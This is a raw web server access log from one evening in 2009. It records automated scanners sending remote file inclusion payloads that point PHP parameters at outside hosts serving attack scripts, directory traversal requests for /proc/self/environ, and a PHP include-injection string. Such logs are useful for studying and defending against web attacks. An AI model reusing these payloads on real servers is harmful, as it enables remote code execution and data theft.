218.234.21.178 - - [28/Jun/2009:20:00:31 -0700] "GET /login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.redneckmba.com"
218.234.21.178 - - [28/Jun/2009:20:00:31 -0700] "GET /logs//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.redneckmba.com"
218.234.21.178 - - [28/Jun/2009:20:00:38 -0700] "GET /logs//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.redneckmba.com"
218.234.21.178 - - [28/Jun/2009:20:00:38 -0700] "GET /logs/access.log//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.redneckmba.com"
218.234.21.178 - - [28/Jun/2009:20:00:38 -0700] "GET /login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.redneckmba.com"
65.60.53.50 - - [28/Jun/2009:20:01:47 -0700] "GET /include/functions.inc.php?REX[INCLUDE_PATH]=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
65.60.53.50 - - [28/Jun/2009:20:01:47 -0700] "GET /logs/access.log%20%20//include/functions.inc.php?REX[INCLUDE_PATH]=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
65.60.53.50 - - [28/Jun/2009:20:01:47 -0700] "GET /logs//include/functions.inc.php?REX[INCLUDE_PATH]=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
203.235.1.115 - - [28/Jun/2009:20:02:01 -0700] "GET /logs/access.log//errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.redneckmba.com"
203.235.1.115 - - [28/Jun/2009:20:02:01 -0700] "GET /logs//errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.redneckmba.com"
203.235.1.115 - - [28/Jun/2009:20:02:01 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.redneckmba.com"
203.235.1.115 - - [28/Jun/2009:20:02:01 -0700] "GET /logs/access.log/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.redneckmba.com"
203.235.1.115 - - [28/Jun/2009:20:02:01 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.redneckmba.com"
203.235.1.115 - - [28/Jun/2009:20:02:02 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.redneckmba.com"
203.235.1.115 - - [28/Jun/2009:20:02:02 -0700] "GET /logs/access.log//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
203.235.1.115 - - [28/Jun/2009:20:02:02 -0700] "GET /logs//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
203.235.1.115 - - [28/Jun/2009:20:02:02 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
203.235.1.115 - - [28/Jun/2009:20:02:02 -0700] "GET /logs/access.log//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
203.235.1.115 - - [28/Jun/2009:20:02:02 -0700] "GET /logs//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
203.235.1.115 - - [28/Jun/2009:20:02:02 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
65.60.53.50 - - [28/Jun/2009:20:02:09 -0700] "GET /include/functions.inc.php?REX[INCLUDE_PATH]=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
65.60.53.50 - - [28/Jun/2009:20:02:09 -0700] "GET /logs//include/functions.inc.php?REX[INCLUDE_PATH]=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
65.60.53.50 - - [28/Jun/2009:20:02:09 -0700] "GET /logs/access.log%20%20//include/functions.inc.php?REX[INCLUDE_PATH]=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
209.172.33.230 - - [28/Jun/2009:20:02:56 -0700] "GET /logs/access.log%20%20//include/functions.inc.php?REX[INCLUDE_PATH]=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
209.172.33.230 - - [28/Jun/2009:20:02:56 -0700] "GET /logs//include/functions.inc.php?REX[INCLUDE_PATH]=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
209.172.33.230 - - [28/Jun/2009:20:02:56 -0700] "GET /include/functions.inc.php?REX[INCLUDE_PATH]=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.234.21.178 - - [28/Jun/2009:20:04:11 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.redneckmba.com"
218.234.21.178 - - [28/Jun/2009:20:04:11 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.redneckmba.com"
218.234.21.178 - - [28/Jun/2009:20:04:11 -0700] "GET /phphtml.php?htmlclass_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.redneckmba.com"
85.214.67.63 - - [28/Jun/2009:20:05:59 -0700] "GET /logs/access.log//?REX[INCLUDE_PATH]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
85.214.67.63 - - [28/Jun/2009:20:05:59 -0700] "GET /?REX[INCLUDE_PATH]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
85.214.67.63 - - [28/Jun/2009:20:05:59 -0700] "GET /logs//?REX[INCLUDE_PATH]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 200 2087 "-" "Mozilla/5.0" "www.redneckmba.com"
60.43.229.5 - - [28/Jun/2009:20:07:35 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
60.43.229.5 - - [28/Jun/2009:20:07:35 -0700] "GET /logs/access.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
60.43.229.5 - - [28/Jun/2009:20:07:35 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
124.115.1.8 - - [28/Jun/2009:20:08:07 -0700] "GET / HTTP/1.1" 200 779 "http://www.redneckmba.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.redneckmba.com"
65.60.53.50 - - [28/Jun/2009:20:10:02 -0700] "GET /logs/access.log//include/functions.inc.php?REX[INCLUDE_PATH]=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
201.232.54.48 - - [28/Jun/2009:20:11:54 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
201.232.54.48 - - [28/Jun/2009:20:11:54 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
201.232.54.48 - - [28/Jun/2009:20:11:57 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
200.54.177.242 - - [28/Jun/2009:20:14:29 -0700] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://barfod.no/image/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
200.54.177.242 - - [28/Jun/2009:20:14:29 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://barfod.no/image/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
200.54.177.242 - - [28/Jun/2009:20:14:29 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://barfod.no/image/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
60.43.229.5 - - [28/Jun/2009:20:15:15 -0700] "GET /logs/access_090112.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:20:17:14 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
195.34.78.110 - - [28/Jun/2009:20:17:14 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
195.34.78.110 - - [28/Jun/2009:20:17:48 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
195.34.78.110 - - [28/Jun/2009:20:17:48 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
195.34.78.110 - - [28/Jun/2009:20:18:02 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
195.34.78.110 - - [28/Jun/2009:20:18:02 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
195.34.78.110 - - [28/Jun/2009:20:18:09 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
91.195.124.16 - - [28/Jun/2009:20:18:42 -0700] "GET /logs/access.log//errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:20:18:43 -0700] "GET /logs/access.log/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:20:18:43 -0700] "GET /logs/access.log//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:20:18:43 -0700] "GET /logs/access.log//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
200.54.177.242 - - [28/Jun/2009:20:18:56 -0700] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://barfod.no/image/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:20:19:00 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
195.34.78.110 - - [28/Jun/2009:20:19:14 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
91.195.124.16 - - [28/Jun/2009:20:19:50 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:20:19:50 -0700] "GET /logs//errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:20:19:50 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:20:19:50 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:20:19:50 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:20:19:50 -0700] "GET /logs//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:20:19:51 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:20:19:51 -0700] "GET /logs//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
67.19.130.218 - - [28/Jun/2009:20:21:06 -0700] "GET /logs/access.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
67.19.130.218 - - [28/Jun/2009:20:21:06 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
67.19.130.218 - - [28/Jun/2009:20:21:06 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
65.55.210.94 - - [28/Jun/2009:20:23:02 -0700] "GET /logs/?M=A HTTP/1.1" 200 2082 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
60.43.229.5 - - [28/Jun/2009:20:23:16 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:20:25:06 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
195.34.78.110 - - [28/Jun/2009:20:25:28 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
195.34.78.110 - - [28/Jun/2009:20:25:32 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
195.34.78.110 - - [28/Jun/2009:20:26:19 -0700] "GET /phphtml.php?htmlclass_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:20:26:19 -0700] "GET /logs/phphtml.php?htmlclass_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:20:26:20 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:20:26:31 -0700] "GET /phphtml.php?htmlclass_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:20:26:31 -0700] "GET /logs/phphtml.php?htmlclass_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:20:26:33 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:20:26:33 -0700] "GET /phphtml.php?htmlclass_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:20:26:33 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:20:26:33 -0700] "GET /logs/phphtml.php?htmlclass_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:20:28:21 -0700] "GET /logs/access.log//errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:20:28:21 -0700] "GET /logs/access.log/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:20:28:21 -0700] "GET /logs/access.log//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:20:28:22 -0700] "GET /logs/access.log//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
62.15.230.250 - - [28/Jun/2009:20:28:29 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://buminch.org/bbs/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
62.15.230.250 - - [28/Jun/2009:20:28:29 -0700] "GET /logs/access.log%20%20//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://buminch.org/bbs/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
62.15.230.250 - - [28/Jun/2009:20:28:29 -0700] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://buminch.org/bbs/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
67.19.130.218 - - [28/Jun/2009:20:29:50 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:20:29:58 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:20:29:58 -0700] "GET /logs//errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:20:29:58 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:20:29:58 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:20:29:58 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:20:29:58 -0700] "GET /logs//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:20:29:59 -0700] "GET /logs//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
91.195.124.16 - - [28/Jun/2009:20:29:59 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.redneckmba.com"
195.244.235.254 - - [28/Jun/2009:20:30:46 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.244.235.254 - - [28/Jun/2009:20:30:46 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.244.235.254 - - [28/Jun/2009:20:30:49 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:20:36:26 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:20:36:26 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:20:36:26 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:20:36:28 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:20:36:28 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
195.34.78.110 - - [28/Jun/2009:20:36:28 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
140.239.58.70 - - [28/Jun/2009:20:43:26 -0700] "GET /phphtml.php?htmlclass_path=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
140.239.58.70 - - [28/Jun/2009:20:43:26 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
140.239.58.70 - - [28/Jun/2009:20:43:26 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
